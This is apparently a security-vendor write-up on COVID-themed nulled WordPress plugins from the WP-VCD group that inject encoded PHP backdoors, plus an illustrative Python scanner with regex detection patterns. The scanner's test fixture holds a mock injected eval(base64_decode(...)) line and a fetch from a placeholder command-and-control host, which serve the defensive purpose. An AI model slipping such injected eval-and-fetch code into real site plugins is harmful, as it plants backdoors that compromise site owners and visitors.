
COVID-19 WordPress Malware

Posted: March 26, 2020

The COVID-19 WordPress Malware is a family of backdoor Trojans associated with the WP-VCD threat actor. This variant of its attacks uses corrupted plugins, themed after Coronavirus tracking utilities, for converting compromised websites into sources of revenue (such as by displaying advertisements). Website admins should avoid unsafe download sources and let appropriate anti-malware tools remove the COVID-19 WordPress Malware, and Web surfers can protect their browsers with various methods, such as script blockers.

WordPress Jumps Aboard the Plague Ship Inadvertently

The WP-VCD threat actor is joining the CoronaVirus Ransomware, the SpyMax RAT, the Vicious Panda threat actor, and dozens – if not hundreds – of other threats in exploiting panic about the COVID-19 virus. WP-VCD is a group of hackers with a long-confirmed preference for converting random users' vulnerable WordPress sites into money-making machines, such as by using them for ad traffic. The organization's latest twist on its backdoor Trojan campaigns is the COVID-19 WordPress Malware, a Coronavirus-themed plugin.

The use of pirated or 'nulled' plugins is one of this entity's favorite means of circulating its for-profit backdoor Trojans. In the case of the COVID-19 WordPress Malware, the site's owner comes across the plugin on a torrent or corrupted website, under names referencing graphs of Coronavirus spread predictions or live trackers. Whatever their names, the plugins have corrupted elements in common: encoded PHP that the plugin adds to every page on the site, along with additional theme hijackers. Like a more standard backdoor Trojan, the COVID-19 WordPress Malware also coordinates its attack features by contacting WP-VCD's Command & Control server of the moment for directives.

Malware experts see this theme as a new change in WP-VCD's social engineering kit, but the COVID-19 WordPress Malware's payload is similar to the threat actor's other ones. It may redirect traffic to third-party websites or load pop-ups automatically, monetizing the interactions with a minimum of hands-on work on WP-VCD's part.

Avoiding Plugging into Blogging Problems

The COVID-19 WordPress Malware is hardly the only Trojan that abuses the Coronavirus panic for its gain. Hijacking WordPress for illicit traffic monetization is something it shares with threats like BabaYaga and Clipsa. The PHP alterations in the COVID-19 WordPress Malware's attacks also are something that many Web designers and programmers could implement with little trouble, which makes illicit plugins an almost permanent threat to WordPress site owners.

Users' first and most crucial defensive guideline is avoiding the torrents, crafted piracy-themed websites, and other resources that WP-VCD uses heavily. Secondarily, they can also scan any downloads, including website plugins, before opening them or implementing any code or scripts found therein. Malware analysts note that the COVID-19 WordPress Malware has few non-aesthetic updates from the threat actor's old Trojans and should be identifiable by the usual heuristics and IoCs.
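As an added illustration (not code from the original page or from any analysis of WP-VCD), the scanner below applies the kind of file-level heuristics the descriptions above point to: it flags PHP files under a wp-content tree that run eval over a decoder, carry a long base64-looking literal, or fetch from a remote host, and it runs over two constructed sample themes written to a temporary directory. The regex patterns, the sample files and the placeholder host are assumptions for illustration, not WP-VCD indicators.

```python
import os
import re
import tempfile

# Heuristics for the traits described above: an eval fed by a decoder, a long
# base64-looking literal, and a theme/plugin file that fetches from a remote host.
DECODER_EVAL = re.compile(r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I)
LONG_BASE64 = re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]")
REMOTE_FETCH = re.compile(r"(?:file_get_contents|curl_init)\s*\(\s*['\"]https?://", re.I)

def score_php(source):
    """Return the names of the heuristics that fire on one PHP file's contents."""
    hits = []
    if DECODER_EVAL.search(source):
        hits.append("eval-over-decoder")
    if LONG_BASE64.search(source):
        hits.append("long-base64-literal")
    if REMOTE_FETCH.search(source):
        hits.append("remote-fetch")
    return hits

def scan_wp_content(root):
    """Walk a wp-content tree; map each suspicious PHP file (posix-style relative path) to its hits."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = score_php(fh.read())
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings

# Constructed sample files (not real WP-VCD code): a clean functions.php and one
# carrying an injected base64-wrapped eval plus a fetch from a placeholder host.
CLEAN = "<?php\nadd_action('wp_head', function () { echo '<meta name=\"x\">'; });\n"
INJECTED = (CLEAN + "eval(base64_decode('" + "QUFB" * 60 + "'));\n"
            + "$d = file_get_contents('http://c2.example.invalid/');\n")

def build_sample_tree():
    """Write the two sample themes into a temp dir and return its path."""
    root = tempfile.mkdtemp()
    for theme, body in (("clean-theme", CLEAN), ("nulled-theme", INJECTED)):
        os.makedirs(os.path.join(root, "themes", theme))
        with open(os.path.join(root, "themes", theme, "functions.php"), "w") as fh:
            fh.write(body)
    return root
```

Calling `scan_wp_content(build_sample_tree())` reports only the nulled theme's functions.php; pointing it at a real wp-content directory produces a triage list, not a verdict, since legitimate plugins occasionally use the same functions.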

Anti-malware services with threat-detecting features for websites should remove the COVID-19 WordPress Malware cleanly from plugin-compromised domains. For users exposing themselves to WordPress sites regularly, pertinent defenses include turning off JavaScript, Flash, and Java on a domain-by-domain basis, as well as blocking advertisements and pop-ups automatically.

The COVID-19 WordPress Malware is an anything-but-shocking pivot from WP-VCD, which is profiting from human tragedy through PHP-funneled money. As with NanoBot e-mail lures and similar attacks, the duty of not letting panic overcome common sense falls on every PC user.
